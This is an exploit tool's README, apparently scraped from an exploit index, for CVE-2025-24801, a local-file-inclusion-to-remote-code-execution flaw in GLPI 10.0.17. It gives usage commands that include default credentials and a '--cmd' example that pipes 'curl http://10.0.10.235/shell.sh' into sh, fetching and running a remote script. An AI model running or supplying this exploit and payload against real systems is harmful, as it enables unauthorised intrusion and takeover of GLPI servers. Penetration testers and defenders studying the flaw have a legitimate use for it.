## https://sploitus.com/exploit?id=12C6583F-562E-51C5-B14E-8164EC95C522
# CVE-2025-24801
This exploit uses CVE-2025-24801 to achieve Remote Code Execution (RCE) via Local File Inclusion (LFI) in GLPI 10.0.17. A [Proof of Concept (PoC)](https://blog.lexfo.fr/glpi-sql-to-rce.html) for this CVE is available, with an explanation of the vulnerability in GLPI.
## Observation
Some applications expose the `/glpi/` endpoint (e.g., `http://172.16.11.130:8080/glpi/front/computer.form.php`). If the target application includes this endpoint, it must be added to the `--url` parameter (e.g., `--url http://172.16.11.130:8080/glpi`).
## Usage
Example usage:
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
```
If you have already executed this exploit and triggered RCE, you can use the `--cmd` parameter to just execute the command.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
```